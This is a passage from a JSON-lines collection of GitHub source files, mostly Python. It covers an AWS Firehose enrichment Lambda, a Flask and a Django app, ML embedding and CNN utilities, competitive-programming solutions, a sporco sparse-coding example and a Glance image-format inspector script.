unproc_count,\n len(keys)))\n\n def getDeviceDetails(self, device_id_set):\n response = {}\n query_device_ids = []\n\n for device_id in device_id_set:\n device_details = self.cache.get(device_id)\n if(device_details is None):\n query_device_ids.append(device_id)\n else:\n response[device_id] = device_details\n\n if len(query_device_ids) > 0:\n self.queryDDB(query_device_ids, response)\n return response\n\n# Exponential Backoff Retry with \"Full Jitter\" from:\n# https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/\nBASE = 2 # seconds\nCAP = 10 # seconds\nMAX_ATTEMPTS = 5 # retry 5 times max\n\ndef expBackoffFullJitter(attempt):\n return random.uniform(0, min(CAP, pow(2, attempt)*BASE))\n\nddb = boto3.resource('dynamodb')\ndatabase = Database(ddb)\n\ndef lambda_handler(event, context):\n source_records = []\n query_devices = set()\n\n print(\"Received batch of {} records\".format(len(event['records'])))\n\n for record in event['records']:\n payload = base64.b64decode(record['data']).decode(ENCODING)\n\n event = json.loads(payload)\n\n source_records.append({\n 'recordId' : record['recordId'],\n 'event' : dict(event) # copy of event\n })\n\n query_devices.add(event['device_id'])\n\n device_details = database.getDeviceDetails(query_devices)\n\n output = []\n successes = 0\n\n for record in source_records:\n event = record['event']\n device_id = event['device_id']\n\n if(device_id in device_details):\n # we have device details\n details = device_details[device_id]\n\n # copy existing event\n trans_event = dict(event)\n\n # enrich event with device details\n trans_event['manufacturer'] = details['manufacturer']\n trans_event['model'] = details['model']\n\n trans_payload = json.dumps(trans_event) + \"\\n\"\n\n output_record = {\n 'recordId': record['recordId'],\n 'result': 'Ok',\n 'data': base64.b64encode(trans_payload.encode(ENCODING)).decode(ENCODING)\n }\n successes += 1\n output.append(output_record)\n else:\n # we couldn't get device details: flag that as an error to firehose\n print(\"ProcessingFailed: couldn't find device \" + str(device_id))\n output_record = {\n 'recordId': record['recordId'],\n 'result': 'ProcessingFailed',\n 'data': None\n }\n output.append(output_record)\n\n print('Successfully processed {} out of {} records.'.format(successes, len(source_records)))\n return {'records': output}\n","repo_name":"aws-samples/serverless-stream-processing-at-scale","sub_path":"Source_Code/FirehoseTransform.py","file_name":"FirehoseTransform.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"70395356003","text":"from talk import talk\nfrom if_online import online\nimport datetime\nfrom take_command import take_command\n\ntalk(\"What should i write, sir\")\nif online == True:\n note = take_command()\nelse:\n note = input(\"Message: \")\nfile = open('jarvis.txt', 'w')\ntalk(\"Sir, Should i include date and time\")\nif online == True:\n snfm = take_command()\nelse:\n print(\"Should I include date and time?\")\n snfm = input(\"'yes' or 'no'\")\nif 'yes' in snfm or 'sure' in snfm:\n strTime = datetime.datetime.now().strftime('%I:%M %p')\n file.write(strTime)\n file.write(\" :- \")\n file.write(note)\n talk(\"Message saved\")\nelse:\n file.write(note)\n talk(\"Message saved\")","repo_name":"Maaz-319/Python","sub_path":"Jarvis_ver.1.13/py/Features/Note.py","file_name":"Note.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34188378791","text":"from gensim.models.keyedvectors import KeyedVectors\nimport gensim\nimport pandas as pn\nfrom nltk import word_tokenize\nimport numpy as np\n# import sys\n# sys.path.append('C:/Users/Juani/chatbot/')\nimport preprocesamiento\n\nclass embeddings():\n def __init__(self,wordvectors,correctedData,tipoEmbed):\n self.tipoEmbed = tipoEmbed\n\n def train(self):\n vec_embeddings=[]\n for i in range(correctedData.shape[0]):\n words = word_tokenize(correctedData[i][1])\n # print(words)\n vec_sentence = []\n for w in words:\n s = wordvectors.get_vector(w)\n if type(s)!=int:\n # print(\"Encontró \",w)\n vec_sentence.append(s)\n prom = np.mean(vec_sentence, axis=0)\n if self.tipoEmbed==1:\n vec_embeddings.append(vec_sentence)\n elif self.tipoEmbed ==2:\n vec_embeddings.append(prom)\n else:\n vec_sentence.append(prom)\n vec_embeddings.append(vec_sentence)\n return(vec_embeddings)\n\n\nif __name__=='__main__':\n print(\"-----------------Cargando los vectores----------------\")\n wordvectors_file_vec = 'C:/Users/Juani/chatbot/fasttext-sbwc.3.6.e20.vec'\n cantidad = 100000\n wordvectors = KeyedVectors.load_word2vec_format(wordvectors_file_vec, limit=cantidad)\n print(\"Listo!\")\n print(\"-----------------Cargando las preguntas---------------\")\n dataset = pn.read_csv(\"pregTest.csv\",header=None,delimiter=',')\n correctedData = preprocesamiento.preprocesar(dataset.values,1) #Dataset lematizado\n print(\"Listo. Las preguntas son: \")\n print(correctedData)\n print(\"------------------Creando embeddings------------------\")\n embed = embeddings(wordvectors,correctedData,1)\n embeddedWords = embed.train()\n print(\"Listo! Embeddings creados correctamente! Por ejemplo, el primero es:\")\n print(embeddedWords[0])","repo_name":"lucianozablocki/chatbot","sub_path":"ia_models/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35331324949","text":"import pyodbc\nimport xml.dom.minidom\nimport configparser\n\n# only works with trusted connection and below SQL\n\ncp = configparser.ConfigParser()\ncp.readfp(open('ConfigFile.properties'))\nprint(cp['properties']['driver'])\nprint(cp['properties']['server'])\n\ndriver = cp['properties']['driver']\nserver = cp['properties']['server']\ndatabase = cp['properties']['database']\ntrusted = \"yes\"\ntestcoveragesql = cp['properties']['testcoveragesql']\noutputFolderLocation = cp['properties']['newreleaseoutputFolderLocation']\n\n\n\ndef getDBConn():\n print('starting DB connection')\n connString = \"Driver={\" + driver + \"};Server=\" + server + \";Database=\" + database + \";Trusted_Connection=\" + trusted + \";\"\n print(\"conn String used :\" + connString)\n conn = pyodbc.connect(connString)\n print('Connection established')\n return conn\n\n\ndef getRowsFromDB(sessionid):\n conn = getDBConn()\n print('opening cursor')\n cursor = conn.cursor()\n print('executing select command')\n print('SQL used :' + testcoveragesql)\n cursor.execute(testcoveragesql, sessionid)\n results = []\n columns = [column[0] for column in cursor.description]\n # print(columns)\n for row in cursor.fetchall():\n results.append(dict(zip(columns, row)))\n # print (results)\n conn.close()\n return results\n\n\ndef readxml(releasefilelocation):\n with open(releasefilelocation, \"r\") as f:\n xmlstring = f.read()\n # print (xmlstring)\n splitting = xmlstring.split('<', 1)\n # print(splitting[1])\n return \"<\" + splitting[1]\n\n\ndef updateXML(releaseXml, stagidsDB):\n stagidlist = []\n doc1 = xml.dom.minidom.parseString(releaseXml)\n # remove existing font formatting\n fontnodes = doc1.getElementsByTagName(\"font\")\n for node in fontnodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # add new font for stageids covered in testing\n\n formatelement = doc1.createElement(\"font\")\n formatelement.setAttribute(\"family\", \"Segoe UI\")\n formatelement.setAttribute(\"size\", \"10\")\n formatelement.setAttribute(\"style\", \"Regular\")\n formatelement.setAttribute(\"color\", \"339966\")\n\n stages = doc1.getElementsByTagName(\"stage\")\n\n print(\"Stageid db: \", stagidsDB)\n for stageidelement in stages:\n stageid = stageidelement.getAttribute(\"stageid\")\n print(\"stageid present in release:\" , stageid)\n\n if stageid in stagidsDB:\n stageidelement.appendChild(formatelement.cloneNode(True))\n print(\"stageid found:\" , stageid)\n #print(doc1.toxml())\n return doc1\n\n#function called by web service to generate new formatted release\ndef generaterelease(sessionid, releasefilelocation, newreleasefilename):\n # get stageids from session log run\n results = getRowsFromDB(sessionid)\n stagidsDB = []\n for row in results:\n stagidsDB.append(str(row['stageid']).lower())\n\n # read release file\n releasefilexml = readxml(releasefilelocation)\n # add formatting to release file for stageids which have run\n newreleasefile = updateXML(releasefilexml, stagidsDB)\n\n with open(outputFolderLocation + \"/\"+ newreleasefilename, \"w\") as fs:\n fs.write(newreleasefile.toxml())\n fs.close()\n return outputFolderLocation + \"/\" + newreleasefilename\n\n\ndef main():\n\n releasefilelocation = \"C:/Users/AEasow/PycharmProjects/TestCoverage/release/Registration Process.bprelease\"\n sessionid = 'b39881dd-af3f-4efa-a3bb-26fe8e939b35'\n # get stageids from session log run\n\n results = getRowsFromDB(sessionid)\n stagidsDB = []\n for row in results:\n stagidsDB.append(str(row['stageid']).lower())\n\n # read release file\n releasefilexml = readxml(releasefilelocation)\n # add formatting to release file for stageids which have run\n newreleasefile = updateXML(releasefilexml, stagidsDB)\n\n with open(outputFolderLocation + \"/testcoverage.bprelease\", \"w\") as fs:\n fs.write(newreleasefile.toxml())\n fs.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ashz30/BluePrism-Automated-Testing","sub_path":"Python Web Service/GenerateTestCoverageRelease.py","file_name":"GenerateTestCoverageRelease.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44453695919","text":"from tgt_grease.enterprise.Model import BaseSourceClass\nfrom tgt_grease.core import Configuration, GreaseContainer\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\nimport datetime\nimport fnmatch\nimport json\nimport os\n\n\nclass SQLSource(BaseSourceClass):\n \"\"\"Source data from a SQL Database\n\n This Source is designed to query a SQL Server for data. A generic configuration looks like this for a\n sql_source::\n\n {\n 'name': 'example_source', # <-- A name\n 'job': 'example_job', # <-- Any job you want to run\n 'exe_env': 'general', # <-- Selected execution environment; Can be anything!\n 'source': 'sql_source', # <-- This source\n 'type': 'postgresql', # <-- SQL Server Type (Only supports PostgreSQL Currently)\n 'dsn': 'SQL_SERVER_CONNECTION', # <-- String representing the Environment variable used to connect with\n 'query': 'select count(*) as order_total from orders where oDate::DATE = current_data', # <-- SQL Query to execute on server\n 'hour': 16, # <-- **OPTIONAL** 24hr time hour to poll SQL\n 'minute': 30, # <-- **OPTIONAL** Minute to poll SQL\n 'logic': {} # <-- Whatever logic your heart desires\n }\n\n Note:\n This configuration is an example\n Note:\n Currently We only support PostreSQL Server\n Note:\n without `minute` parameter the engine will poll for the entire hour\n Note:\n **Hour and minute parameters are in UTC time**\n Note:\n To only poll once an hour only set the **minute** field\n\n \"\"\"\n\n def parse_source(self, configuration):\n \"\"\"This will Query the SQL Server to find data\n\n Args:\n configuration (dict): Configuration of Source. See Class Documentation above for more info\n\n Returns:\n bool: If True data will be scheduled for ingestion after deduplication. If False the engine will bail out\n\n \"\"\"\n ioc = GreaseContainer()\n if configuration.get('hour'):\n if datetime.datetime.utcnow().hour != int(configuration.get('hour')):\n # it is not the correct hour\n return True\n if configuration.get('minute'):\n if datetime.datetime.utcnow().minute != int(configuration.get('minute')):\n # it is not the correct hour\n return True\n if configuration.get('type') != 'postgresql':\n ioc.getLogger().error(\"Unsupported SQL Server Type; Currently Only supporting PostgreSQL\", notify=False)\n return False\n else:\n # Attempt to get the DSN for the connection\n if os.environ.get(configuration.get('dsn')) and configuration.get('query'):\n # ensure the DSN is setup and the query is present\n try:\n DSN = os.environ.get(configuration.get('dsn'))\n with psycopg2.connect(DSN) as conn:\n with conn.cursor(cursor_factory=RealDictCursor) as cursor:\n cursor.execute(configuration.get('query'))\n data = cursor.fetchall()\n for row in data:\n self._data.append(row)\n del ioc\n return True\n except Exception as e:\n # Naked except to prevent issues around connections\n ioc.getLogger().error(\"Error processing configuration; Error [{0}]\".format(e.message), notify=False)\n del ioc\n return False\n else:\n # could not get the DSN\n ioc.getLogger().error(\"Failed to locate the DSN variable\", notify=False)\n del ioc\n return False\n\n def mock_data(self, configuration):\n \"\"\"Data from this source is mocked utilizing the GREASE Filesystem\n\n Mock data for this source can be place in `/etc/*.mock.sql.json`. This source will pick up all these\n files and load them into the returning object. The data in these files should reflect what you expect to return\n from SQL::\n\n {\n 'column expected': 'value expected'\n ...\n }\n\n Args:\n configuration (dict): Configuration Data for source\n\n Note:\n Argument **configuration** is not honored here\n Note:\n A mock file should represent a single row\n\n Returns:\n list[dict]: Mocked Data\n\n \"\"\"\n intermediate = list()\n matches = []\n conf = Configuration()\n for root, dirnames, filenames in os.walk(conf.greaseDir + 'etc'):\n for filename in fnmatch.filter(filenames, '*.mock.sql.json'):\n matches.append(os.path.join(root, filename))\n for doc in matches:\n with open(doc) as current_file:\n content = current_file.read().replace('\\r\\n', '')\n try:\n intermediate.append(json.loads(content))\n except ValueError:\n continue\n return intermediate\n","repo_name":"target/grease","sub_path":"tgt_grease/enterprise/Sources/SQLSearch.py","file_name":"SQLSearch.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"54"} +{"seq_id":"35107565305","text":"#!/usr/bin/env python3\n\n#BoBoBo#\n\ndef rank(num, scores, find):\n r = num\n for i in range(num):\n if scores[i] <= find:\n r-=1\n\n print(r + 1)\n\n\nwhile True:\n num = input()\n if '-1' == num:\n break\n scores = input().split(' ')\n scores = list(map(lambda s : int(s), scores))\n find = input()\n rank(int(num), scores, int(find))\n","repo_name":"hellohellocode/ProgramKit","sub_path":"hellokit/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12216278625","text":"import re\n\n\n# set with all visible trees\n# each element is a tuple with (row_idx, column_idx)\ntrees = {}\n\n\ndef update_tree(row_idx, col_idx, score):\n key = row_idx, col_idx\n if key in trees:\n trees[key] *= score\n else:\n trees[key] = score\n\n\ndef get_scores(arr):\n scores = [0]*len(arr)\n for i, h in enumerate(arr):\n # determine idx of sub array arr[:i] which has the highest height\n # but of at least h\n argmax_i = 0\n for j, hj in enumerate(arr[:i]):\n if hj >= h:\n argmax_i = j\n # print(f'i: {i}, argmax_i: {argmax_i}')\n scores[i] = i - argmax_i\n return scores\n\n\nif __name__ == \"__main__\":\n\n with open('../../days_inputs/day-08.txt', 'r') as f:\n\n rows = []\n columns = []\n\n row_idx = 0\n\n while True:\n line = f.readline()\n line_stripped = line.rstrip()\n if line_stripped == '':\n break\n\n r = [int(i) for i in re.findall(r'\\d', line_stripped)]\n rows.append(r)\n\n if len(columns) == 0:\n columns = [[] for _ in range(len(r))]\n\n for i, h in enumerate(r):\n columns[i].append(h)\n\n # add scores of trees for left to right\n scores = get_scores(r)\n # print(f'LR scores: {scores}')\n for col_idx, score in enumerate(scores):\n update_tree(row_idx, col_idx, score)\n\n r_copy = r.copy()\n r_copy.reverse()\n scores = get_scores(r_copy)\n # print(f'RL scores: {scores}')\n for rev_col_idx, score in enumerate(scores):\n col_idx = (len(r) - 1) - rev_col_idx\n update_tree(row_idx, col_idx, score)\n\n row_idx += 1\n\n for col_idx, col in enumerate(columns):\n scores = get_scores(col)\n for row_idx, score in enumerate(scores):\n update_tree(row_idx, col_idx, score)\n\n # count visible trees right to left\n c_copy = col.copy()\n c_copy.reverse()\n scores = get_scores(c_copy)\n for rev_row_idx, score in enumerate(scores):\n row_idx = (len(col) - 1) - rev_row_idx\n update_tree(row_idx, col_idx, score)\n\n # print(trees[(3, 2)])\n # part 2 solution: 230112\n print(max(list(trees.values())))\n","repo_name":"pedrodeoliveira/advent-of-code","sub_path":"2022/python/day-08/day8-part2.py","file_name":"day8-part2.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2447479063","text":"from flask import Flask, render_template, redirect, session, request\nfrom flask_app import app\nfrom flask_app.models.author import Author\nfrom flask_app.models.book import Book\n\n\n@app.route('/')\ndef root():\n return redirect('new/author')\n\n##### NEW AUTHOR TEMPLATE PAGE #####\n@app.route('/new/author')\ndef new_author():\n all_authors = Author.get_all_auths()\n return render_template('new_author.html', auths=all_authors)\n\n##### POST: ADD NEW AUTHOR #####\n@app.route('/add/author', methods=[\"POST\"])\ndef add_new_author():\n\n data = {\n 'name': request.form['auth_name']\n }\n Author.add_author(data)\n return redirect('/')\n\n##### AUTHOR FAVORITE PAGE #####\n@app.route('/author/favorites')\ndef author_favorites():\n books = Book.get_all_books()\n return render_template('author_favorites.html', books=books)\n\n@app.route('/author/favorites/')\ndef show_auth_favorites(auth_id):\n author = Author.get_single_auth({'id': auth_id})\n faves = author.get_auth_favorites({'id': auth_id})\n fave_ids = []\n for book in faves:\n fave_ids.append(book['id'])\n books = Book.get_all_books()\n return render_template('author_favorites.html', auth=author, all_books=books, faves=faves, fave_ids=fave_ids)\n\n##### ADD BOOK TO AUTHOR'S FAVORITES #####\n@app.route('/add/author/favorite/', methods=[\"POST\"])\ndef add_author_favorite(auth_id):\n author = Author.get_single_auth({'id':auth_id})\n data = {\n 'author_id': auth_id,\n 'book_id': request.form['book_id']\n }\n author.add_auth_favorite(data)\n return redirect(f'/author/favorites/{auth_id}')\n\n\n########### ADDED DELETE AUTHOR METHOD BUT ONLY WORKS FOR AUTHS WITHOUT\n# RELATIONSHIPS TO OTHER TABLES\n# DIDN'T HAVE TIME TO FINISH OUT THE FUNCTIONALITY\n# STUDYING TO ACE THE EXAM\n\n@app.route('/delete/author/', methods=[\"POST\"])\ndef delete_author(auth_id):\n data = {\n 'id': auth_id\n }\n Author.delete_author(data)\n return redirect('/')","repo_name":"reidroberts24/Python-Fundamentals","sub_path":"Books/flask_app/controllers/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26772266682","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Project : AI. @by PyCharm\n# @File : base\n# @Time : 2023/5/26 10:39\n# @Author : betterme\n# @WeChat : meutils\n# @Software : PyCharm\n# @Description :\n\nfrom meutils.pipe import *\nfrom fastapi import APIRouter, Body, Depends, HTTPException\n\nrouter = APIRouter()\n\n\n@router.get(\"/\")\ndef read_root():\n return {\"Hi, baby.\": \"https://github.com/yuanjie-ai/ChatLLM\"}\n\n\n@router.get(\"/gpu\")\ndef gpu_info():\n return os.popen(\"nvidia-smi\").read()\n\n\n@router.get(\"/v1/models\")\ndef get_models():\n ret = {\"data\": [], \"object\": \"list\"}\n ret['data'].append({\n \"created\": 1677610602,\n \"id\": \"gpt-3.5-turbo\",\n \"object\": \"model\",\n \"owned_by\": \"openai\",\n \"permission\": [\n {\n \"created\": 1680818747,\n \"id\": \"modelperm-fTUZTbzFp7uLLTeMSo9ks6oT\",\n \"object\": \"model_permission\",\n \"allow_create_engine\": False,\n \"allow_sampling\": True,\n \"allow_logprobs\": True,\n \"allow_search_indices\": False,\n \"allow_view\": True,\n \"allow_fine_tuning\": False,\n \"organization\": \"*\",\n \"group\": None,\n \"is_blocking\": False\n }\n ],\n \"root\": \"gpt-3.5-turbo\",\n \"parent\": None,\n })\n ret['data'].append({\n \"created\": 1671217299,\n \"id\": \"text-embedding-ada-002\",\n \"object\": \"model\",\n \"owned_by\": \"openai-internal\",\n \"permission\": [\n {\n \"created\": 1678892857,\n \"id\": \"modelperm-Dbv2FOgMdlDjO8py8vEjD5Mi\",\n \"object\": \"model_permission\",\n \"allow_create_engine\": False,\n \"allow_sampling\": True,\n \"allow_logprobs\": True,\n \"allow_search_indices\": True,\n \"allow_view\": True,\n \"allow_fine_tuning\": False,\n \"organization\": \"*\",\n \"group\": None,\n \"is_blocking\": False\n }\n ],\n \"root\": \"text-embedding-ada-002\",\n \"parent\": \"\"\n })\n\n return ret\n","repo_name":"yuanjie-ai/ChatLLM","sub_path":"chatllm/api/routes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":340,"dataset":"github-code","pt":"54"} +{"seq_id":"25837440574","text":"import numpy as np\nfrom gensim.models import Word2Vec\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.layers import Dense, Embedding, Conv1D, MaxPooling1D, \\\n GlobalMaxPooling1D\nfrom tensorflow.python.keras.layers import Dropout\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.optimizers import Adam\n\n\nclass CNNUtils:\n @staticmethod\n def tokens_to_string(tokens, p_tokenizer):\n inverse_map = dict(zip(p_tokenizer.word_index.values(), p_tokenizer.word_index.keys()))\n words = [inverse_map[token] for token in tokens if token != 0]\n text = ''.join(words)\n return text\n\n @staticmethod\n def get_word2vec_embedding_matrix(embedding_size, p_tokenizer, words_list):\n w2v_model = Word2Vec(words_list, min_count=1, size=embedding_size, workers=3, window=3, sg=1)\n model_save_location = \"vocabulary_vec\"\n w2v_model.wv.save_word2vec_format(model_save_location)\n word2vec = {}\n with open(model_save_location, encoding='UTF-8') as f:\n for line in f:\n values = line.split()\n word = values[0]\n vec = np.asarray(values[1:], dtype='float32')\n word2vec[word] = vec\n words_number = len(list(p_tokenizer.word_index))\n result_embedding_matrix = np.random.uniform(-1, 0, (words_number + 1, embedding_size))\n for word, i in p_tokenizer.word_index.items():\n if i < words_number:\n embedding_vector = word2vec.get(word)\n if embedding_vector is not None:\n result_embedding_matrix[i] = embedding_vector\n return result_embedding_matrix\n\n @staticmethod\n def build_model(p_tokenizer, p_embedding_matrix, p_max_tokens, number_of_classes, number_of_filters,\n p_weight_decay):\n cnn_model = Sequential()\n cnn_model.add(Embedding(input_dim=len(list(p_tokenizer.word_index)) + 1,\n output_dim=p_embedding_matrix.shape[1],\n weights=[p_embedding_matrix],\n input_length=p_max_tokens,\n trainable=True, # the layer is trained\n name='embedding_layer'))\n cnn_model.add(Conv1D(number_of_filters, 7, activation='relu', padding='same'))\n cnn_model.add(MaxPooling1D(2))\n cnn_model.add(Conv1D(number_of_filters, 7, activation='relu', padding='same'))\n cnn_model.add(GlobalMaxPooling1D())\n cnn_model.add(Dropout(0.5))\n cnn_model.add(Dense(32, activation='relu', kernel_regularizer=regularizers.l2(p_weight_decay)))\n cnn_model.add(Dense(number_of_classes, activation='softmax')) # multi-label (k-hot encoding)\n adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n cnn_model.compile(loss='sparse_categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n cnn_model.summary()\n # define callbacks\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=4, verbose=1)\n return cnn_model, [early_stopping]\n","repo_name":"smaranda-perju/CLEF2020-CheckThat-Lab-Team2","sub_path":"Sprint2/Experiments/Tweets_and_fake_news_classification/utility/cnn_utils.py","file_name":"cnn_utils.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6287338393","text":"import useful_tools\nimport docx\n\n\nprint(useful_tools.roll_dice(10))\n\n\n\nclass Student:\n def __init__(self,name, major,gpa,is_on_prob):\n self.name = name \n self.major = major\n self.gpa = gpa\n self.is_on_prob = is_on_prob\n\n","repo_name":"keerthika06/pythton-basics","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18068048199","text":"from __future__ import print_function\nfrom builtins import input\n\nimport numpy as np\n\nfrom sporco.admm import bpdn\nfrom sporco import plot\n\n\n\"\"\"\nConfigure problem size, sparsity, and noise level.\n\"\"\"\n\nN = 512 # Signal size\nM = 4*N # Dictionary size\nL = 32 # Number of non-zero coefficients in generator\nsigma = 0.5 # Noise level\n\n\n\"\"\"\nConstruct random dictionary, reference random sparse representation, and test signal consisting of the synthesis of the reference sparse representation with additive Gaussian noise.\n\"\"\"\n\n# Construct random dictionary and random sparse coefficients\nnp.random.seed(12345)\nD = np.random.randn(N, M)\nx0 = np.zeros((M, 1))\nsi = np.random.permutation(list(range(0, M-1)))\nx0[si[0:L]] = np.random.randn(L, 1)\n\n# Construct reference and noisy signal\ns0 = D.dot(x0)\ns = s0 + sigma*np.random.randn(N,1)\n\n\n\"\"\"\nSet :class:`.bpdn.BPDNProjL1` solver class options. The value of $\\gamma$ has been manually chosen for good performance.\n\"\"\"\n\ngamma = 2.5e1\nopt = bpdn.BPDNProjL1.Options({'Verbose': True, 'MaxMainIter': 500,\n 'RelStopTol': 1e-6, 'AutoRho': {'RsdlTarget': 1.0}})\n\n\n\"\"\"\nInitialise and run BPDNProjL1 object\n\"\"\"\n\nb = bpdn.BPDNProjL1(D, s, gamma, opt)\nx = b.solve()\n\nprint(\"BPDNProjL1 solve time: %.2fs\" % b.timer.elapsed('solve'))\n\n\n\"\"\"\nPlot comparison of reference and recovered representations.\n\"\"\"\n\nplot.plot(np.hstack((x0, x)), title='Sparse representation',\n lgnd=['Reference', 'Reconstructed'])\n\n\n\"\"\"\nPlot functional value, residuals, and rho\n\"\"\"\n\nits = b.getitstat()\nfig = plot.figure(figsize=(20, 5))\nplot.subplot(1, 3, 1)\nplot.plot(its.ObjFun, xlbl='Iterations', ylbl='Functional', fig=fig)\nplot.subplot(1, 3, 2)\nplot.plot(np.vstack((its.PrimalRsdl, its.DualRsdl)).T,\n ptyp='semilogy', xlbl='Iterations', ylbl='Residual',\n lgnd=['Primal', 'Dual'], fig=fig)\nplot.subplot(1, 3, 3)\nplot.plot(its.Rho, xlbl='Iterations', ylbl='Penalty Parameter', fig=fig)\nfig.show()\n\n\n# Wait for enter on keyboard\ninput()\n","repo_name":"bwohlberg/sporco","sub_path":"examples/scripts/sc/bpdnprjl1.py","file_name":"bpdnprjl1.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"54"} +{"seq_id":"17801245801","text":"import sys\n\nn,m,h,k = map(int, input().split())\ns = list(input())\npotions = []\npos = [0,0]\nfor i in range(m):\n x,y = map(int, input().split())\n potions.append([x,y])\n\n\ndef move(char, pos):\n if char == \"R\":\n pos[0] += 1\n elif char == \"L\":\n pos[0] -= 1\n elif char == \"U\":\n pos[1] += 1\n elif char == \"D\":\n pos[1] -= 1\n return pos\n\nfor char in s:\n h -= 1\n\n if h < 0:\n print(\"No\")\n sys.exit(0)\n\n pos = move(char, pos)\n if pos in potions:\n if h < k:\n potions.remove(pos)\n h = k\n\nprint(\"Yes\")","repo_name":"mishio-n/atcoder","sub_path":"20230527/c copy.py","file_name":"c copy.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5443837846","text":"import argparse\nimport logging\nimport sys\n\nfrom oslo_utils import units\n\nfrom glance.common import format_inspector\nfrom glance.tests.unit.common import test_format_inspector\n\n\ndef main():\n formats = ['raw', 'qcow2', 'vhd', 'vhdx', 'vmdk', 'vdi']\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-f', '--format', default='raw',\n help='Format (%s)' % ','.join(sorted(formats)))\n parser.add_argument('-b', '--block-size', default=65536, type=int,\n help='Block read size')\n parser.add_argument('--context-limit', default=(1 * 1024), type=int,\n help='Maximum memory footprint (KiB)')\n parser.add_argument('-i', '--input', default=None,\n help='Input file. Defaults to stdin')\n parser.add_argument('-v', '--verify', action='store_true',\n help=('Verify our number with qemu-img '\n '(requires --input)'))\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n fmt = format_inspector.get_inspector(args.format)(tracing=args.debug)\n\n if args.input:\n input_stream = open(args.input, 'rb')\n else:\n input_stream = sys.stdin.buffer\n\n stream = format_inspector.InfoWrapper(input_stream, fmt)\n count = 0\n found_size = False\n while True:\n chunk = stream.read(int(args.block_size))\n # This could stream to an output destination or stdin for testing\n # sys.stdout.write(chunk)\n if not chunk:\n break\n count += len(chunk)\n if args.format != 'raw' and not found_size and fmt.virtual_size != 0:\n # Print the point at which we've seen enough of the file to\n # know what the virtual size is. This is almost always less\n # than the raw_size\n print('Determined virtual size at byte %i' % count)\n found_size = True\n\n if fmt.format_match:\n print('Source was %s file, virtual size %i MiB (%i bytes)' % (\n fmt, fmt.virtual_size / units.Mi, fmt.virtual_size))\n else:\n print('*** Format inspector did not detect file as %s' % args.format)\n\n print('Raw size %i MiB (%i bytes)' % (fmt.actual_size / units.Mi,\n fmt.actual_size))\n print('Required contexts: %s' % str(fmt.context_info))\n mem_total = sum(fmt.context_info.values())\n print('Total memory footprint: %i bytes' % mem_total)\n\n # To make sure we're not storing the whole image, complain if the\n # format inspector stored more than context_limit data\n if mem_total > args.context_limit * 1024:\n print('*** ERROR: Memory footprint exceeded!')\n\n if args.verify and args.input:\n size = test_format_inspector.get_size_from_qemu_img(args.input)\n if size != fmt.virtual_size:\n print('*** QEMU disagrees with our size of %i: %i' % (\n fmt.virtual_size, size))\n else:\n print('Confirmed size with qemu-img')\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"openstack/glance","sub_path":"tools/test_format_inspector.py","file_name":"test_format_inspector.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":501,"dataset":"github-code","pt":"54"} +{"seq_id":"15517850063","text":"from django.contrib import admin\nfrom movies.api.viewsets import MoviesList, RatingList, TotalRating, NoRateList\nfrom django.urls import path, include\nfrom rest_framework import routers\n\nroute = routers.DefaultRouter()\nroute.register(r'movies', MoviesList, basename=\"Movies\") #/movies\n\nroute_rating = routers.DefaultRouter()\nroute_rating.register(r'rate', RatingList, basename=\"Rates\") #/rate\n\nroute_total = routers.DefaultRouter()\nroute_total.register(r'total', TotalRating, basename=\"Total\") #/total\n\nroute_norate = routers.DefaultRouter()\nroute_norate.register(r'norate', NoRateList, basename='NoRate' ) #/norate\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(route.urls)), #movies\n path('', 